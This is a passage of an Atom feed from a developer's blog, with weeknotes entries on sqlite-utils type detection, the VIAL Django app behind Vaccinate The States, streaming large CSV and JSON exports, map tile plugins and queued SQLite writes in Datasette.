&lt;p&gt;The &lt;code&gt;replace()&lt;/code&gt; operation there is needed because the &lt;code&gt;vaccination_data.json&lt;/code&gt; file calls New York "New York State" while the &lt;code&gt;us-states.csv&lt;/code&gt; file just calls it "New York".&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;max(t1.date)&lt;/code&gt; and &lt;code&gt;group by t1.state&lt;/code&gt; is &lt;a href="http://www.sqlite.org/draft/lang_select.html#bareagg"&gt;a useful SQLite&lt;/a&gt; trick: if you perform a &lt;code&gt;group by&lt;/code&gt; and then ask for the &lt;code&gt;max()&lt;/code&gt; of a value, the other columns returned from that table will be the columns for the row that contains that maximum value.&lt;/p&gt;
&lt;p&gt;This demo is a bit of a stretch - once I reach this level of complexity I'm more likely to load the files into a SQLite database file on disk and open them up in &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; - but it's a fun example of a more complex join in action.&lt;/p&gt;
&lt;h4&gt;Also in sqlite-utils 3.10&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;sqlite-utils memory&lt;/code&gt; command has another new trick up its sleeve: it automatically detects which columns in a CSV or TSV file contain integer or float values and creates the corresponding in-memory SQLite table with the correct types. This ensures &lt;code&gt;max()&lt;/code&gt; and &lt;code&gt;sum()&lt;/code&gt; and &lt;code&gt;order by&lt;/code&gt; work in a predictable manner, without accidentally sorting &lt;code&gt;1&lt;/code&gt; as higher than &lt;code&gt;11&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I didn't want to break backwards compatibility for existing users of the &lt;code&gt;sqlite-utils insert&lt;/code&gt; command so I've added type detection there as a new option, &lt;code&gt;--detect-types&lt;/code&gt; or &lt;code&gt;-d&lt;/code&gt; for short:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sqlite-utils insert my.db us_states us-states.csv --csv -d
  [####################################]  100%
$ sqlite-utils schema my.db
CREATE TABLE "us_states" (
   [date] TEXT,
   [state] TEXT,
   [fips] INTEGER,
   [cases] INTEGER,
   [deaths] INTEGER
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There's more &lt;a href="https://sqlite-utils.datasette.io/en/latest/changelog.html#v3-10"&gt;in the changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Releases this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/sqlite-utils/releases/tag/3.10"&gt;3.10&lt;/a&gt; - (&lt;a href="https://github.com/simonw/sqlite-utils/releases"&gt;78 releases total&lt;/a&gt;) - 2021-06-19
&lt;br /&gt;Python CLI utility and library for manipulating SQLite databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/dogsheep/dogsheep-beta"&gt;dogsheep-beta&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/dogsheep/dogsheep-beta/releases/tag/0.10.2"&gt;0.10.2&lt;/a&gt; - (&lt;a href="https://github.com/dogsheep/dogsheep-beta/releases"&gt;20 releases total&lt;/a&gt;) - 2021-06-13
&lt;br /&gt;Build a search index across content from multiple SQLite database tables and run faceted searches against it using Datasette&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/yaml-to-sqlite"&gt;yaml-to-sqlite&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/yaml-to-sqlite/releases/tag/1.0"&gt;1.0&lt;/a&gt; - (&lt;a href="https://github.com/simonw/yaml-to-sqlite/releases"&gt;5 releases total&lt;/a&gt;) - 2021-06-13
&lt;br /&gt;Utility for converting YAML files to SQLite&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/markdown-to-sqlite"&gt;markdown-to-sqlite&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/markdown-to-sqlite/releases/tag/1.0"&gt;1.0&lt;/a&gt; - (&lt;a href="https://github.com/simonw/markdown-to-sqlite/releases"&gt;2 releases total&lt;/a&gt;) - 2021-06-13
&lt;br /&gt;CLI tool for loading markdown files into a SQLite database&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;TIL this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/vim/mouse-support-in-vim"&gt;Mouse support in vim&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="json"/><category term="projects"/><category term="sql"/><category term="sqlite"/><category term="weeknotes"/><category term="sqlite-utils"/></entry><entry><title>Weeknotes: Vaccinate The States, and how I learned that returning dozens of MB of JSON works just fine these days</title><link href="https://simonwillison.net/2021/Apr/26/vaccinate-the-states/#atom-tag" rel="alternate"/><published>2021-04-26T01:02:22+00:00</published><updated>2021-04-26T01:02:22+00:00</updated><id>https://simonwillison.net/2021/Apr/26/vaccinate-the-states/#atom-tag</id><summary type="html">
    &lt;p&gt;On Friday &lt;a href="https://www.vaccinateca.com/"&gt;VaccinateCA&lt;/a&gt; grew in scope, a lot: we launched a new website called &lt;a href="https://www.vaccinatethestates.com/"&gt;Vaccinate The States&lt;/a&gt;. Patrick McKenzie wrote &lt;a href="https://www.kalzumeus.com/2021/04/23/vaccinate-the-states/"&gt;more about the project here&lt;/a&gt; - the short version is that we're building the most comprehensive possible dataset of vaccine availability in the USA, using a combination of data collation, online research and continuing to make a huge number of phone calls.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of Vaccinate The States, showing a map with a LOT of markers on it" src="https://static.simonwillison.net/static/2021/vaccinate-the-states.png" style="max-width:100%;" /&gt;&lt;/p&gt;
&lt;p&gt;VIAL, the Django application I've been working on &lt;a href="https://simonwillison.net/tags/vaccinateca/"&gt;since late February&lt;/a&gt;, had to go through some extensive upgrades to help support this effort!&lt;/p&gt;
&lt;p&gt;VIAL has a number of responsibilities. It acts as our central point of truth for the vaccination locations that we are tracking, powers the app used by our callers to serve up locations to call and record the results, and as-of this week it's also a central point for our efforts to combine data from multiple other providers and scrapers.&lt;/p&gt;
&lt;p&gt;The data ingestion work is happening in a public repository, &lt;a href="https://github.com/CAVaccineInventory/vaccine-feed-ingest"&gt;CAVaccineInventory/vaccine-feed-ingest&lt;/a&gt;. I have yet to write a single line of code there (and I thoroughly enjoy working on that kind of code) because I've been heads down working on VIAL itself to ensure it can support the ingestion efforts.&lt;/p&gt;
&lt;h4&gt;Matching and concordances&lt;/h4&gt;
&lt;p&gt;If you're combining data about vaccination locations from a range of different sources, one of the biggest challenges is de-duplicating the data: it's important the same location doesn't show up multiple times (potentially with slightly differing details) due to appearing in multiple sources.&lt;/p&gt;
&lt;p&gt;Our first step towards handling this involved the addition of "concordance identifiers" to VIAL.&lt;/p&gt;
&lt;p&gt;I first encountered the term "concordance" being used for this &lt;a href="https://whosonfirst.org/docs/concordances/"&gt;in the Who's On First project&lt;/a&gt;, which is building a gazetteer of every city/state/country/county/etc on earth.&lt;/p&gt;
&lt;p&gt;A concordance is an identifier in another system. Our location ID for RITE AID PHARMACY 05976 in Santa Clara is &lt;code&gt;receu5biMhfN8wH7P&lt;/code&gt; - which is &lt;code&gt;e3dfcda1-093f-479a-8bbb-14b80000184c&lt;/code&gt; in &lt;a href="https://vaccinefinder.org/"&gt;VaccineFinder&lt;/a&gt; and &lt;code&gt;7537904&lt;/code&gt; in &lt;a href="https://www.vaccinespotter.org/"&gt;Vaccine Spotter&lt;/a&gt; and &lt;code&gt;ChIJZaiURRPKj4ARz5nAXcWosUs&lt;/code&gt; in Google Places.&lt;/p&gt;
&lt;p&gt;We're storing them in a Django table called &lt;code&gt;ConcordanceIdentifier&lt;/code&gt;: each record has an &lt;code&gt;authority&lt;/code&gt; (e.g. &lt;code&gt;vaccinespotter_org&lt;/code&gt;) and an identifier (&lt;code&gt;7537904&lt;/code&gt;) and a many-to-many relationship to our &lt;code&gt;Location&lt;/code&gt; model.&lt;/p&gt;
&lt;p&gt;Why many-to-many? Surely we only want a single location for any one of these identifiers?&lt;/p&gt;
&lt;p&gt;Exactly! That's why it's many-to-many: because if we import the same location twice, then assign concordance identifiers to it, we can instantly spot that it's a duplicate and needs to be merged.&lt;/p&gt;
&lt;h4&gt;Raw data from scrapers&lt;/h4&gt;
&lt;p&gt;&lt;code&gt;ConcordanceIdentifier&lt;/code&gt; also has a many-to-many relationship with a new table, called &lt;code&gt;SourceLocation&lt;/code&gt;. This table is essentially a PostgreSQL JSON column with a few other columns (including &lt;code&gt;latitude&lt;/code&gt; and &lt;code&gt;longitude&lt;/code&gt;) into which our scrapers and ingesters can dump raw data. This means we can use PostgreSQL queries to perform all kinds of analysis on the unprocessed data before it gets cleaned up, de-duplicated and loaded into our point-of-truth &lt;code&gt;Location&lt;/code&gt; table.&lt;/p&gt;
&lt;h4&gt;How to dedupe and match locations?&lt;/h4&gt;
&lt;p&gt;Initially I thought we would do the deduping and matching inside of VIAL itself, using the raw data that had been ingested into the &lt;code&gt;SourceLocation&lt;/code&gt; table.&lt;/p&gt;
&lt;p&gt;Since we were on a tight internal deadline it proved more practical for people to start experimenting with matching code outside of VIAL. But that meant they needed the raw data - 40,000+ location records (and growing rapidly).&lt;/p&gt;
&lt;p&gt;A few weeks ago I built a CSV export feature for the VIAL admin screens, using Django's &lt;a href="https://docs.djangoproject.com/en/3.2/ref/request-response/#django.http.StreamingHttpResponse"&gt;StreamingHttpResponse&lt;/a&gt; class combined with keyset pagination for bulk export without sucking the entire table into web server memory - &lt;a href="https://til.simonwillison.net/django/export-csv-from-django-admin"&gt;details in this TIL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Our data ingestion team wanted a GeoJSON export - specifically newline-delimited GeoJSON - which they could then load into &lt;a href="https://geopandas.org/"&gt;GeoPandas&lt;/a&gt; to help run matching operations.&lt;/p&gt;
&lt;p&gt;So I built a simple "search API" which defaults to returning 20 results at a time, but also has an option to "give me everything" - using the same technique I used for the CSV export: keyset pagination combined with a &lt;code&gt;StreamingHttpResponse&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;And it worked! It turns out that if you're running on modern infrastructure (Cloud Run and Cloud SQL in our case) in 2021 getting Django to return 50+MB of JSON in a streaming response works just fine.&lt;/p&gt;
&lt;p&gt;Some of these exports are taking 20+ seconds, but for a small audience of trusted clients that's completely fine.&lt;/p&gt;
&lt;p&gt;While working on this I realized that my idea of what size of data is appropriate for a dynamic web application to return more or less formed back in 2005. I still think it's rude to serve multiple MBs of JavaScript up to an inexpensive mobile phone on an expensive connection, but for server-to-server or server-to-automation-script situations serving up 50+ MB of JSON in one go turns out to be a perfectly cromulent way of doing things.&lt;/p&gt;
&lt;h4&gt;Export full results from django-sql-dashboard&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://github.com/simonw/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt; is my Datasette-inspired library for adding read-only arbitrary SQL queries to any Django+PostgreSQL application.&lt;/p&gt;
&lt;p&gt;I built the first version &lt;a href="https://simonwillison.net/2021/Mar/14/weeknotes/"&gt;last month&lt;/a&gt; to help compensate for switching VaccinateCA away from Airtable - one of the many benefits of Airtable is that it allows all kinds of arbitrary reporting, and Datasette has shown me that bookmarkable SQL queries can provide a huge amount of that value with very little written code, especially within organizations where SQL is already widely understood.&lt;/p&gt;
&lt;p&gt;While it allows people to run any SQL they like (against a read-only PostgreSQL connection with a time limit) it restricts viewing to the first 1,000 records to be returned - because building robust, performant pagination against arbitrary SQL queries is a hard problem to solve.&lt;/p&gt;
&lt;p&gt;Today I released &lt;a href="https://github.com/simonw/django-sql-dashboard/releases/tag/0.10a0"&gt;django-sql-dashboard 0.10a0&lt;/a&gt; with the ability to export all results for a query as a downloadable CSV or TSV file, using the same &lt;code&gt;StreamingHttpResponse&lt;/code&gt; technique as my Django admin CSV export and all-results-at-once search endpoint.&lt;/p&gt;
&lt;p&gt;I expect it to be pretty useful! It means I can run any SQL query I like against a Django project and get back the full results - often dozens of MBs - in a form I can import into other tools (including Datasette).&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of the SQL Dashboard interface, showing the new 'Export as CSV/TSV' buttons which trigger a file download dialog" src="https://static.simonwillison.net/static/2021/export-csv-dashboard.png" style="max-width:100%;" /&gt;&lt;/p&gt;
&lt;h4&gt;TIL this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/django/django-admin-horizontal-scroll.md"&gt;Usable horizontal scrollbars in the Django admin for mouse users&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/django/filter-by-comma-separated-values.md"&gt;Filter by comma-separated values in the Django admin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/postgresql/constructing-geojson-in-postgresql.md"&gt;Constructing GeoJSON in PostgreSQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/main/django/export-csv-from-django-admin.md"&gt;Django Admin action for exporting selected rows as CSV&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Releases this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/django-sql-dashboard/releases/tag/0.10a1"&gt;0.10a1&lt;/a&gt; - (&lt;a href="https://github.com/simonw/django-sql-dashboard/releases"&gt;21 total releases&lt;/a&gt;) - 2021-04-25
&lt;br /&gt;Django app for building dashboards using raw SQL queries&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-admin"&gt;django-admin&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vaccines"&gt;vaccines&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vaccinate-ca"&gt;vaccinate-ca&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="django"/><category term="django-admin"/><category term="postgresql"/><category term="projects"/><category term="vaccines"/><category term="weeknotes"/><category term="vaccinate-ca"/><category term="django-sql-dashboard"/></entry><entry><title>Weeknotes: Mostly messing around with map tiles</title><link href="https://simonwillison.net/2021/Feb/7/weeknotes/#atom-tag" rel="alternate"/><published>2021-02-07T05:53:19+00:00</published><updated>2021-02-07T05:53:19+00:00</updated><id>https://simonwillison.net/2021/Feb/7/weeknotes/#atom-tag</id><summary type="html">
    &lt;p&gt;Most of what I worked on this week was covered in &lt;a href="https://simonwillison.net/2021/Feb/4/datasette-tiles/"&gt;Serving map tiles from SQLite with MBTiles and datasette-tiles&lt;/a&gt;. I built two new plugins: &lt;a href="https://datasette.io/plugins/datasette-tiles"&gt;datasette-tiles&lt;/a&gt; for serving map tiles, and &lt;a href="https://datasette.io/plugins/datasette-basemap"&gt;datasette-basemap&lt;/a&gt; which bundles map tiles for zoom levels 0-6 of OpenStreetMap. I also released &lt;a href="https://datasette.io/tools/download-tiles"&gt;download-tiles&lt;/a&gt; for downloading tiles and bundling them into an MBTiles database.&lt;/p&gt;
&lt;h4&gt;sqlite-utils 3.4.1&lt;/h4&gt;
&lt;p&gt;I added one new feature to &lt;a href="https://sqlite-utils.datasette.io/"&gt;sqlite-utils&lt;/a&gt;: the &lt;code&gt;sqlite-utils import&lt;/code&gt; command can now be configured to read CSV files using alternative delimiters, by passing the &lt;code&gt;--delimiter&lt;/code&gt; option or the &lt;code&gt;--quotechar&lt;/code&gt; option.&lt;/p&gt;
&lt;p&gt;This is &lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#cli-insert-csv-tsv-delimiter"&gt;covered in the documentation&lt;/a&gt;, which provides the following example:&lt;/p&gt;
&lt;pre lang="csv"&gt;&lt;code&gt;name;description
Cleo;|Very fine; a friendly dog|
Pancakes;A local corgi
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Imported using:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;sqlite-utils insert dogs.db dogs dogs.csv \
  --delimiter=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;;&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; --quotechar=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;|&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;Datasette 0.54.1&lt;/h4&gt;
&lt;p&gt;I spotted a subtle but nasty regression in Datasette: a change I made to how hidden form fields worked on the table page meant that clearing the &lt;code&gt;_search&lt;/code&gt; search input and re-submitting the form didn't take effect, and the search would persist. &lt;a href="https://docs.datasette.io/en/stable/changelog.html#v0-54-1"&gt;Datasette 0.54.1&lt;/a&gt; fixes that bug.&lt;/p&gt;
&lt;h4&gt;Releases this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-jellyfish"&gt;datasette-jellyfish&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-jellyfish/releases/tag/1.0.1"&gt;1.0.1&lt;/a&gt; - 2021-02-06
&lt;br /&gt;Datasette plugin adding SQL functions for fuzzy text matching powered by Jellyfish&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/sqlite-utils/releases/tag/3.4.1"&gt;3.4.1&lt;/a&gt; - 2021-02-06
&lt;br /&gt;Python CLI utility and library for manipulating SQLite databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-tiles"&gt;datasette-tiles&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-tiles/releases/tag/0.5"&gt;0.5&lt;/a&gt; - 2021-02-04
&lt;br /&gt;Mapping tile server for Datasette, serving tiles from MBTiles packages&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/download-tiles"&gt;download-tiles&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/download-tiles/releases/tag/0.4"&gt;0.4&lt;/a&gt; - 2021-02-03
&lt;br /&gt;Download map tiles and store them in an MBTiles database&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-basemap"&gt;datasette-basemap&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-basemap/releases/tag/0.2"&gt;0.2&lt;/a&gt; - 2021-02-02
&lt;br /&gt;A basemap for Datasette and datasette-leaflet&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette"&gt;datasette&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette/releases/tag/0.54.1"&gt;0.54.1&lt;/a&gt; - 2021-02-02
&lt;br /&gt;An open source multi-tool for exploring and publishing data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-cluster-map"&gt;datasette-cluster-map&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-cluster-map/releases/tag/0.17.1"&gt;0.17.1&lt;/a&gt; - 2021-02-01
&lt;br /&gt;Datasette plugin that shows a map for any data with latitude/longitude columns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://github.com/simonw/datasette-leaflet"&gt;datasette-leaflet&lt;/a&gt;&lt;/strong&gt;: &lt;a href="https://github.com/simonw/datasette-leaflet/releases/tag/0.2.2"&gt;0.2.2&lt;/a&gt; - 2021-02-01
&lt;br /&gt;Datasette plugin adding the Leaflet JavaScript library&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;TIL this week&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/til/til/sqlite_splitting-commas-sqlite.md"&gt;Splitting on commas in SQLite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/til/til/datasette_serving-mbtiles.md"&gt;Serving MBTiles with datasette-media&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/til/til/gis_mapzen-elevation-tiles.md"&gt;Downloading MapZen elevation tiles&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite-utils"&gt;sqlite-utils&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/leaflet"&gt;leaflet&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="datasette"/><category term="weeknotes"/><category term="sqlite-utils"/><category term="leaflet"/></entry><entry><title>CSVs: The good, the bad, and the ugly</title><link href="https://simonwillison.net/2020/Nov/5/csvs-good-bad-and-ugly/#atom-tag" rel="alternate"/><published>2020-11-05T17:19:05+00:00</published><updated>2020-11-05T17:19:05+00:00</updated><id>https://simonwillison.net/2020/Nov/5/csvs-good-bad-and-ugly/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://alexgaynor.net/2020/sep/24/csv-good-bad-ugly/"&gt;CSVs: The good, the bad, and the ugly&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Useful, thoughtful summary of the pros and cons of the most common format for interchanging data.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/alex_gaynor/status/1309269404534878215"&gt;@alex_gaynor&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/alex-gaynor"&gt;alex-gaynor&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;&lt;/p&gt;



</summary><category term="alex-gaynor"/><category term="csv"/></entry><entry><title>Weeknotes: Datasette Writes</title><link href="https://simonwillison.net/2020/Feb/26/weeknotes-datasette-writes/#atom-tag" rel="alternate"/><published>2020-02-26T06:34:46+00:00</published><updated>2020-02-26T06:34:46+00:00</updated><id>https://simonwillison.net/2020/Feb/26/weeknotes-datasette-writes/#atom-tag</id><summary type="html">
    &lt;p&gt;As &lt;a href="https://simonwillison.net/2020/Jan/21/weeknotes-datasette-cloud-and-zero-downtime-deployments/#datasette-upload-csvs"&gt;discussed previously&lt;/a&gt;, the biggest hole in Datasette's feature set at the moment involves writing to the database.&lt;/p&gt;

&lt;p&gt;Datasette was born as a hack to abuse serverless, stateless hosting by bundling a static, immutable database as part of the deployment. The key idea was that for some use-cases - such as data journalism - you don't need to be able to continually update your data. It's just the facts that support the story you are trying to tell.&lt;/p&gt;

&lt;p&gt;I also believed the conventional wisdom that SQLite is fine for reads but shouldn't be trusted to handle web application writes. I no longer believe this to be the case: SQLite is &lt;em&gt;great&lt;/em&gt; at handling writes, as millions of iPhone and Android apps will attest.&lt;/p&gt;

&lt;p&gt;Meanwhile, the biggest blocker to people trying out Datasette is that they would need to convert their data to SQLite somehow in order to use it. I've been building &lt;a href="https://datasette.readthedocs.io/en/stable/ecosystem.html#tools-for-creating-sqlite-databases"&gt;a family of CLI tools for this&lt;/a&gt;, but that requires users to both be familiar with the command-line and to &lt;em&gt;install software on their computers&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;So: Datasette needs to grow web-based tools for loading data into the database.&lt;/p&gt;

&lt;p&gt;Datasette's &lt;a href="https://datasette.readthedocs.io/en/stable/plugins.html"&gt;plugin system&lt;/a&gt; is the ideal space for experimenting with ways of doing this, without needing to try out crazy new features on Datasette's own core.&lt;/p&gt;

&lt;p&gt;There's just one big problem: SQLite may be great at fast, reliable writes but it still doesn't like concurrent writes: it's important to only ever have one connection writing to a SQLite database at a time.&lt;/p&gt;

&lt;p&gt;I've been mulling over the best way to handle this for &lt;a href="https://github.com/simonw/datasette/issues/567"&gt;the best part of a year&lt;/a&gt;... and then a couple of days ago I had a breakthrough: with a dedicated write thread for a database file, I could use a Python queue to ensure only one write could access the database at a time.&lt;/p&gt;

&lt;p&gt;There's prior art for this: SQLite wizard Charles Leifer &lt;a href="https://charlesleifer.com/blog/multi-threaded-sqlite-without-the-operationalerrors/"&gt;released code plus a beautiful explanation&lt;/a&gt; of how to queue writes to SQLite back in 2017. I'm not sure why I didn't settle on his approach sooner.&lt;/p&gt;

&lt;p&gt;So... &lt;a href="https://datasette.readthedocs.io/en/stable/changelog.html#v0-37"&gt;Datasette 0.37&lt;/a&gt;, released this evening, has a new capability exposed to plugins: they can now request that an operation (either a SQL statement or a full custom Python function) be &lt;a href="https://github.com/simonw/datasette/issues/682"&gt;queued up to execute inside a thread&lt;/a&gt; that posesses an exclusive write connection to a SQLite database.&lt;/p&gt;

&lt;p&gt;I've documented how plugins can use this in the new plugin internals documentation: &lt;a href="https://datasette.readthedocs.io/en/latest/internals.html#database-class"&gt;execute_write() and execute_write_fn()&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;So far there's only one public plugin that takes advantage of this: &lt;a href="https://github.com/simonw/datasette-upload-csvs"&gt;datasette-upload-csvs&lt;/a&gt;, which previously used &lt;a href="https://github.com/simonw/datasette-upload-csvs/blob/699e6ca591f36264bfc8e590d877e6852f274beb/datasette_upload_csvs/app.py#L43-L46"&gt;a dirty hack&lt;/a&gt; but has now been upgraded to use the new &lt;code&gt;execute_write_fn()&lt;/code&gt; method.&lt;/p&gt;

&lt;p&gt;I'm really excited about the potential plugins this unlocks though. I experimented with a logging plugin and a plugin for deleting tables while I was building the hooks (full implementations of those are posted as comments in &lt;a href="https://github.com/simonw/datasette/pull/683"&gt;the pull request&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Other use-cases I'm interested to explore include:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;Plugins that import data from other APIs or services. Imagine web UI interfaces to some of my &lt;a href="https://github.com/dogsheep"&gt;Dogsheep tools&lt;/a&gt; for example.&lt;/li&gt;&lt;li&gt;Plugins that periodically update data - pulling the latest CSV updates from government open data portals (like &lt;a href="https://simonwillison.net/2019/Mar/13/tree-history/"&gt;San Francisco's trees&lt;/a&gt;).&lt;/li&gt;&lt;li&gt;Tools for enhancing tables with additional data derived from their values - geocoding or reverse geocoding columns, resolving identifiers and so on.&lt;/li&gt;&lt;li&gt;Now that plugins have a tool for maintaining their own state, plugins could use SQLite tables to track things like which saved searches have been executed.&lt;/li&gt;&lt;li&gt;A plugin that lets you attach annotations to rows and columns in other tables, storing those annotations in its own SQLite database.&lt;/li&gt;&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/threads"&gt;threads&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="plugins"/><category term="sqlite"/><category term="threads"/><category term="datasette"/><category term="weeknotes"/></entry><entry><title>Weeknotes: Datasette Cloud and zero downtime deployments</title><link href="https://simonwillison.net/2020/Jan/21/weeknotes-datasette-cloud-and-zero-downtime-deployments/#atom-tag" rel="alternate"/><published>2020-01-21T20:56:46+00:00</published><updated>2020-01-21T20:56:46+00:00</updated><id>https://simonwillison.net/2020/Jan/21/weeknotes-datasette-cloud-and-zero-downtime-deployments/#atom-tag</id><summary type="html">
    &lt;p&gt;Yesterday's piece on &lt;a href="https://simonwillison.net/2020/Jan/21/github-actions-cloud-run/"&gt;Tracking FARA by deploying a data API using GitHub Actions and Cloud Run&lt;/a&gt; was originally intended to be my weeknotes, but ended up getting a bit too involved.&lt;/p&gt;

